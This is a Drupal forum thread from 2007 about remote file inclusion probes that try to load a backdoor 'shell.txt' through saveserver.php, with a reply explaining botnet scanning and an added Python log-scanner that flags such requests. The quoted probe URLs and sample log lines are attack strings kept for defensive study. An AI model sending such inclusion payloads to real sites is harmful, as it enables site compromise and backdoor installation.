Bad guy, very very bad guy

modul - December 27, 2007 - 23:08

Hi all,

Every now and then, I get a visitor from this location:

http://my_ip_number/admin/business_inc/saveserver.php?thisdir=http://som...?

(I'm a bit hesitant to disclose the name of this some_dutch_site and some_dutch_person, because when I visit that site without the shell.txt in the url, I get some sort of very decent graphics artist, nothing suspicious. My hunch is that this guy doesn't even know his url is being misused by the character who put that shell.txt on his site. Could be wrong here, but that's my feeling).

The IP from which this visit originates is different: the first time it came from Taiwan, then from France, and now it comes from Nebraska, from the "Phillips Manufacturing Company".

I have done some googling on "saveserver.php", and from what I understand, it tries to exploit an inclusion vulnerability in some server setup.

I also read the "shell.txt" from my visitor's url. My antivirus program protested, because it included some Backdoor (something) virus. I did manage to read the .txt file, however, and from glancing through it, I'd say it tries to collect a multitude of information from any site it gets access to.

Luckily, my Drupal guided this apparently unwanted visitor to an "Access Denied" page. Obviously, there is no admin/business_inc folder in my (or any Drupal) setup.

My question: I can't block this character on an IP basis, because the IP number changes every time. There is, however, a consistency in the location (see top). Can I make some access rule or anything kicking this fellow to the moon, on the basis of the location string? E.g.: can I make something which keeps anything with "saveserver.php" in the url far away from my site?

I don't think there is any immediate danger, but I don't like this type of buggers. So, if anyone could help me getting visited by them, I'd be Very Thankful!

Drupal.org broke the naughty

modul - December 27, 2007 - 23:10

Drupal.org broke the naughty url a bit too soon. Here it is again, in pieces:

http://my_sites_ip_number/admin/business_inc/saveserver.php?thisdir=
http://some_dutch_site/some_dutch_person/shell.txt?

Obviously, the last sentence

modul - December 28, 2007 - 15:34

Obviously, the last sentence should read: "If anyone could help me NOT getting visited by them..." :-)

Anyway, the request still stands: any clues, anyone, on keeping these scumbags in their holes?

I get those

SueCarlson - December 28, 2007 - 20:33

I get someone that is advertising a drug on my chat room registration. I know I should block it, but it never shows up in the database, not really sure why. The Chat room that it shows up on, sometimes 3 or 4 times a day, requires registration, and I can't find it to block it.

Have not had that on the drupal sites as yet, cuz they aren't being released yet. Will keep you posted if they do.

www.sueswebdesigns.suesman.net

bastards

dman - December 28, 2007 - 21:32

Unfortunately, that's just background noise, and it'll always be there.
It's just a robot (part of a botnet I imagine) randomly scanning the entire web for known vulnerabilities on old sites.
Simply, because your site doesn't respond to 'saveserver.php', the probe fails, and it moves on to the next potential victim. There are a hundred or so potential requests that the bots may choose to make (such as direct calls to unpatched IIS DLLs, upload scripts on older cgi tools etc) and several million bots out there.
It's neither you, nor the incoming IP (a compromised bot), nor the targeted Dutch site that's responsible or can do much about it.

BUT if you actually got something back from the shell.txt request when you went looking, it means that the Dutch site has already been compromised and is being used as a step in a chain. It would be nice to drop him an email and let him know to delete it!

.dan.
How to troubleshoot Drupal | http://www.coders.co.nz/
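The probe the thread describes is a remote file inclusion attempt: a query parameter (here `thisdir`) whose value is itself a full URL to a remote script. Since the source IP rotates, the useful fingerprint is that parameter shape, not the address. The following is an added example (not code from the thread or from Drupal) that scans Apache combined-format access log lines for that pattern; the log lines are constructed samples with documentation addresses, and the log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache "combined" format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Dec/2007:22:58:01 +0100] "GET /admin/business_inc/saveserver.php?thisdir=http://example.invalid/user/shell.txt? HTTP/1.1" 403 512 "-" "Mozilla/4.0"
198.51.100.9 - - [27/Dec/2007:23:01:15 +0100] "GET /node/12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.44 - - [28/Dec/2007:09:12:40 +0100] "GET /index.php?q=user/login HTTP/1.1" 200 4096 "http://example.invalid/" "Mozilla/5.0"
192.0.2.45 - - [28/Dec/2007:09:13:02 +0100] "GET /index.php?page=https://example.invalid/c.txt HTTP/1.1" 403 512 "-" "libwww-perl/5.8"
"""

# Fields of the combined format that matter here: client IP, timestamp,
# request line (method, target, protocol) and the response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_rfi_probe(target):
    """True when any query-string value is an absolute remote URL.

    parse_qsl percent-decodes values, so an encoded scheme such as
    http%3A%2F%2F is caught as well as the plain form seen in the thread.
    """
    query = urlsplit(target).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().lstrip().startswith(REMOTE_SCHEMES):
            return True
    return False


def scan_log(text):
    """Return (ip, request target, status) for every line that looks like an RFI probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_rfi_probe(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, target, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

The status column is worth keeping in the report: a 403 or 404, as in the thread, means the probe failed, while a 200 on such a request is the case that needs investigating.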
